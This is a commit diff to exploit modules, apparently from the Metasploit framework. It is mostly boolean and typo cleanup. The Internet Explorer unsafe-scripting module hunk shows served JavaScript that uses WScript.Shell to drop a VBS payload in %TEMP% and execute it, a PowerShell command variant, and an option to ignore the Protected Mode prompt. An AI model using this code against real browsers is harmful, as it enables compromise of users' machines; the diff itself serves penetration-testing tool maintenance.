modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb
View File

@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
], self.class)
register_advanced_options(
[
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', '7500']),
OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments', 7500]),
], self.class)
register_autofilter_ports([ 50013 ])
end

4
modules/exploits/osx/browser/safari_file_policy.rb
View File

@ -168,7 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
# msf/core/exploit/http/server.rb
#
def start_http(opts={})
# Ensture all dependencies are present before initializing HTTP
# Ensure all dependencies are present before initializing HTTP
use_zlib
comm = datastore['ListenerComm']
@ -255,7 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote
# set.
#
def use_zlib
if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true)
if !Rex::Text.zlib_present? && datastore['HTTP::compression']
fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!")
end
end

2
modules/exploits/unix/webapp/php_vbulletin_template.rb
View File

@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
elsif datastore['HTTP::chunked']
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
fail_with(Failure::Unknown, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')

2
modules/exploits/unix/webapp/php_xmlrpc_eval.rb
View File

@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
elsif datastore['HTTP::chunked']
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
fail_with(Failure::BadConfig, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005. Try disabling HTTP::chunked and trying again.')

2
modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb
View File

@ -110,7 +110,7 @@ print "LFI test for storable flaw is: $frozen\n";
end
def exploit
if datastore['DESTRUCTIVE'] == true
if datastore['DESTRUCTIVE']
exploit_destructive
else
exploit_nondestructive

96
modules/exploits/windows/browser/ie_unsafe_scripting.rb
View File

@ -8,16 +8,26 @@ require 'msf/util/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
Rank = ManualRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
VULN_CHECK_JS = %Q|
try {
new ActiveXObject("WScript.Shell");
new ActiveXObject("Scripting.FileSystemObject");
is_vuln = true;
} catch(e) {}
|
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
'Description' => %q{
'Name' => 'Microsoft Internet Explorer Unsafe Scripting Misconfiguration',
'Description' => %q{
This exploit takes advantage of the "Initialize and script ActiveX controls not
marked safe for scripting" setting within Internet Explorer. When this option is set,
IE allows access to the WScript.Shell ActiveX control, which allows javascript to
@ -36,43 +46,77 @@ class MetasploitModule < Msf::Exploit::Remote
IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
an x64 iexplore.exe.
By default, this module will not attempt to fire against IEs that come with Protected
Mode enabled by default, because it can trigger a security prompt. However, if you are
feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT
datastore option to true.
},
'License' => MSF_LICENSE,
'Author' =>
'License' => MSF_LICENSE,
'Author' =>
[
'natron',
'Ben Campbell' # PSH and remove ADODB.Stream
],
'References' =>
'References' =>
[
[ 'URL', 'http://support.microsoft.com/kb/182569' ],
[ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
[ 'URL', 'http://support.microsoft.com/kb/870669']
],
'DisclosureDate' => 'Sep 20 2010',
'Platform' => 'win',
'Targets' =>
'DisclosureDate' => 'Sep 20 2010',
'Platform' => 'win',
'BrowserRequirements' => {
source: 'script',
os_name: OperatingSystems::Match::WINDOWS,
ua_name: HttpClients::IE,
vuln_test: VULN_CHECK_JS,
vuln_test_error: 'WScript.Shell or Scripting.FileSystemObject not allowed by browser.'
},
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
[ 'Windows x86/x64', {} ]
],
'DefaultOptions' =>
'DefaultOptions' =>
{
'HTTP::compression' => 'gzip'
},
'DefaultTarget' => 0))
'DefaultTarget' => 0
))
register_options(
[
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
OptBool.new('ALLOWPROMPT', [true, 'Allow exploit to ignore the protected mode prompt', false]),
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']])
], self.class
)
end
def on_request_uri(cli, request)
# Unfortunately we don't currently have an explicit way to check whether Protected Mode is
# actually enabled or not, so we can only rely on whatever is default on the OS. This should
# allow BAP2 to always fire without worrying about the prmopt popping up, but the user can
# still ignore this by setting ALLOWPROMPT to true in standalone mode.
def has_protected_mode_prompt?(browser)
if datastore['ALLOWPROMPT']
return false
elsif OperatingSystems::Match::WINDOWS_XP === browser[:os_name]
return false
end
true
end
def on_request_exploit(cli, request, browser)
if has_protected_mode_prompt?(browser)
print_warning("This target possibly has Protected Mode, exploit aborted.")
send_not_found(cli)
return
end
# Build out the HTML response page
var_shellobj = rand_text_alpha(rand(5)+5)
var_shellobj = rand_text_alpha(rand(5)+5)
p = regenerate_payload(cli)
if datastore['TECHNIQUE'] == 'VBS'
@ -92,10 +136,10 @@ class MetasploitModule < Msf::Exploit::Remote
end
def vbs_technique(var_shellobj, p)
var_fsobj = rand_text_alpha(rand(5)+5)
var_fsobj_file = rand_text_alpha(rand(5)+5)
var_vbsname = rand_text_alpha(rand(5)+5)
var_writedir = rand_text_alpha(rand(5)+5)
var_fsobj = rand_text_alpha(rand(5)+5)
var_fsobj_file = rand_text_alpha(rand(5)+5)
var_vbsname = rand_text_alpha(rand(5)+5)
var_writedir = rand_text_alpha(rand(5)+5)
exe = generate_payload_exe({ :code => p.encoded })
vbs = Msf::Util::EXE.to_exe_vbs(exe)
@ -103,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
# Build the javascript that will be served
js_content = %Q|
//<html><head></head><body><script>
<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
var #{var_fsobj} = new ActiveXObject("Scripting.FileSystemObject");
var #{var_writedir} = #{var_shellobj}.ExpandEnvironmentStrings("%TEMP%");
@ -114,20 +158,20 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
//</script></html>
</script></html>
|
return js_content
js_content
end
def psh_technique(var_shellobj, p)
cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
js_content = %Q|
//<html><head></head><body><script>
<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
//</script></html>
</script></html>
|
return js_content
js_content
end
end

2
modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
View File

@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'DisablePayloadHandler' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>

2
modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
View File

@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'false',
'DisablePayloadHandler' => false,
'InitialAutoRunScript' => 'migrate -f'
},
'Payload' =>

4
modules/exploits/windows/browser/winamp_playlist_unc.rb
View File

@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
register_evasion_options(
[
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false])
])
end
@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
def generate_space
if datastore['PlaylistSpaceInjection'] == true
if datastore['PlaylistSpaceInjection']
return rand_text(rand(100)+1, nil, " \t")
else
return ''

2
modules/exploits/windows/email/ms10_045_outlook_ref_only.rb
View File

@ -334,7 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote
msg.to = datastore['MAILTO']
msg.from = datastore['MAILFROM']
if datastore['HTML'] == true
if datastore['HTML']
body = create_email_body_html(datastore['MESSAGE'], msg.subject)
content_type = "text/html; charset=\"iso-8859-1\""
msg.add_part(body, content_type, 'quoted-printable')

2
modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
View File

@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Platform' => 'win',
'Targets' =>

2
modules/exploits/windows/fileformat/foxit_reader_launch.rb
View File

@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

2
modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
View File

@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

2
modules/exploits/windows/fileformat/galan_fileformat_bof.rb
View File

@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

2
modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb
View File

@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

2
modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb
View File

@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

2
modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb
View File

@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

2
modules/exploits/windows/fileformat/ideal_migration_ipj.rb
View File

@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true',
'DisablePayloadHandler' => true,
},
'Payload' =>
{

Some files were not shown because too many files have changed in this diff Show More